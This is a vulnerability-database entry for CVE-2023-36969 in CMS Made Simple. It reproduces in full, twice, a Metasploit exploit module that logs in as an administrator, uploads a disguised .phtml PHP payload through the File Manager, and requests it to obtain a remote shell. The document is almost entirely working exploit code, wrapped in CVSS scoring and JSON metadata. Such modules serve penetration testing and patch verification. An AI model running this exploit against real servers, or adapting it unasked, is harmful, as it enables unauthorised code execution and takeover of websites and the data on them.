CmsMadeSimple Authenticated File Manager RCE_MSF:EXPLOIT-MULTI-HTTP-CMSMS_FILE_MANAGER_AUTH_RCE-

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files with the .phar or .phtml extensions, enabling execution of PHP code ...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-HTTP-CMSMS_FILE_MANAGER_AUTH_RCE-

Published Aug 29, 2025 at 18:53

Modified Mar 28, 2025 at 18:50

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'CmsMadeSimple Authenticated File Manager RCE',
'Description' => %q{
CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
with the .phar or .phtml extensions, enabling execution of PHP code
leading to RCE. The file can be executed by accessing its URL in the
/uploads/ directory.

Tested on v2.2.21, v2.2.18, v2.2.17, v2.2.16, v2.2.15, v2.2.14.
},
'License' => MSF_LICENSE,
'Author' => [
'Okan Kurtuluş', # Initial research
'Mirabbas Ağalarov', # EDB PoC
'tastyrice' # Metasploit Module
],
'References' => [
['CVE', '2023-36969'],
['EDB', '51600']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [
[
'Universal', {}
]
],
'Privileged' => false,
'DisclosureDate' => '2023-06-07',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'Base directory path for cmsms', '/']),
OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
]
)
end

def multipart_form_data(uri, data, message)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', uri),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{message.bound}",
'keep_cookies' => true
)
end

def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '', 'index.php'),
'method' => 'GET'
)
unless res && res.code == 200
vprint_error('Connection Failed')
return CheckCode::Unknown
end

set_cookie = res.get_cookies
return CheckCode::Safe unless set_cookie&.match?(/^CMSSESSID/)

html = res.get_html_document
version = Rex::Version.new(html.at('p.copyright-info').text.scan(/\d+\.\d+\.\d+/).first)
vprint_status("#{peer} - CMS Made Simple Version: #{version}")

return CheckCode::Appears if version <= Rex::Version.new('2.2.21')

CheckCode::Detected
end

def login
data = {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'loginsubmit' => 'Submit'
}
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
'method' => 'POST',
'vars_post' => data,
'keep_cookies' => true
)
fail_with(Failure::NoAccess, 'Authentication was unsuccessful') unless res&.code == 302 && cookie_jar.cookies && res.headers['Location'] =~ %r{/admin$}

store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
vprint_good("#{peer} - Authentication was successful")
end

def send_file
filename = "#{rand_text_alpha(8..12)}.phtml"
c = cookie_jar.cookies.find { |cookie| cookie.name == '__c' }.value
payload = get_write_exec_payload(unlink_self: true)

# create the message with payload
message = Rex::MIME::Message.new
message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
message.add_part(c, nil, nil, 'form-data; name="__c"')
message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
message.add_part(payload, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}\"")
data = message.to_s

# send payload
payload_res = multipart_form_data('moduleinterface.php', data, message)
fail_with(Failure::UnexpectedReply, 'Failed to upload the file') unless payload_res && payload_res.code == 200
vprint_good("#{peer} - File uploaded #{filename}")

# open shell
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'uploads', filename),
'method' => 'GET'
)
return unless res && res.code == 404

print_error("Shell #{shell_name} not found")
end

def exploit
login
send_file
end
end

{
    "lastseen": "2025-08-29T19:22:55",
    "description": "CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files           with the .phar or .phtml extensions, enabling execution of PHP code          ...",
    "published": "2025-08-29T18:53:39",
    "modified": "2025-03-28T18:50:03",
    "type": "metasploit",
    "title": "CmsMadeSimple Authenticated File Manager RCE",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-HTTP-CMSMS_FILE_MANAGER_AUTH_RCE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2023-36969"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::PhpEXE\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'CmsMadeSimple Authenticated File Manager RCE',\n        'Description' => %q{\n          CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files\n          with the .phar or .phtml extensions, enabling execution of PHP code\n          leading to RCE. The file can be executed by accessing its URL in the\n          /uploads/ directory.\n\n          Tested on v2.2.21, v2.2.18, v2.2.17, v2.2.16, v2.2.15, v2.2.14.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'Okan Kurtulu\u015f',\t# Initial research\n          'Mirabbas A\u011falarov',\t# EDB PoC\n          'tastyrice'\t# Metasploit Module\n        ],\n        'References' => [\n          ['CVE', '2023-36969'],\n          ['EDB', '51600']\n        ],\n        'Platform' => ['php'],\n        'Arch' => ARCH_PHP,\n        'Targets' => [\n          [\n            'Universal', {}\n          ]\n        ],\n        'Privileged' => false,\n        'DisclosureDate' => '2023-06-07',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS]\n        }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'Base directory path for cmsms', '/']),\n        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),\n        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])\n      ]\n    )\n  end\n\n  def multipart_form_data(uri, data, message)\n    send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'admin', uri),\n      'method' => 'POST',\n      'data' => data,\n      'ctype' => \"multipart/form-data; boundary=#{message.bound}\",\n      'keep_cookies' => true\n    )\n  end\n\n  def check\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, '', 'index.php'),\n      'method' => 'GET'\n    )\n    unless res && res.code == 200\n      vprint_error('Connection Failed')\n      return CheckCode::Unknown\n    end\n\n    set_cookie = res.get_cookies\n    return CheckCode::Safe unless set_cookie&.match?(/^CMSSESSID/)\n\n    html = res.get_html_document\n    version = Rex::Version.new(html.at('p.copyright-info').text.scan(/\\d+\\.\\d+\\.\\d+/).first)\n    vprint_status(\"#{peer} - CMS Made Simple Version: #{version}\")\n\n    return CheckCode::Appears if version <= Rex::Version.new('2.2.21')\n\n    CheckCode::Detected\n  end\n\n  def login\n    data = {\n      'username' => datastore['USERNAME'],\n      'password' => datastore['PASSWORD'],\n      'loginsubmit' => 'Submit'\n    }\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),\n      'method' => 'POST',\n      'vars_post' => data,\n      'keep_cookies' => true\n    )\n    fail_with(Failure::NoAccess, 'Authentication was unsuccessful') unless res&.code == 302 && cookie_jar.cookies && res.headers['Location'] =~ %r{/admin$}\n\n    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n    vprint_good(\"#{peer} - Authentication was successful\")\n  end\n\n  def send_file\n    filename = \"#{rand_text_alpha(8..12)}.phtml\"\n    c = cookie_jar.cookies.find { |cookie| cookie.name == '__c' }.value\n    payload = get_write_exec_payload(unlink_self: true)\n\n    # create the message with payload\n    message = Rex::MIME::Message.new\n    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name=\"mact\"')\n    message.add_part(c, nil, nil, 'form-data; name=\"__c\"')\n    message.add_part('1', nil, nil, 'form-data; name=\"disable_buffer\"')\n    message.add_part(payload, nil, nil, \"form-data; name=\\\"m1_files[]\\\"; filename=\\\"#{filename}\\\"\")\n    data = message.to_s\n\n    # send payload\n    payload_res = multipart_form_data('moduleinterface.php', data, message)\n    fail_with(Failure::UnexpectedReply, 'Failed to upload the file') unless payload_res && payload_res.code == 200\n    vprint_good(\"#{peer} - File uploaded #{filename}\")\n\n    # open shell\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'uploads', filename),\n      'method' => 'GET'\n    )\n    return unless res && res.code == 404\n\n    print_error(\"Shell #{shell_name} not found\")\n  end\n\n  def exploit\n    login\n    send_file\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/http/cmsms_file_manager_auth_rce/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply